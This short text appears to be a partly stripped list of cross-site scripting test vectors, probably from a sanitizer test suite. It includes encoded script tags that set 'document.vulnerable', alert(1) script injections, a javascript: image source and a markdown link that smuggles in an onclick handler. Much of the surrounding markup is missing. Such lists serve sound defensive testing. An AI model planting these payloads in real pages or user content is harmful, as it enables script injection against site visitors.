< lang="en">
XSS
document.vulnerable=true;//-->
<
<
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
¼script¾document.vulnerable=true;¼/script¾
&
+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
exp/*XSS
foo
![]()
![]()
![]()
![]()
;
]]
< attributeName="innerHTML" to="XSS">
XSS
document.vulnerable=true'); ?>
<script>alert(1)</script>
<img src="javascript:alert(1)"
foolink
link2
link3
link4 ><script>alert(1)</script>
![img](http://example.com"onclick="alert(1))
</script>)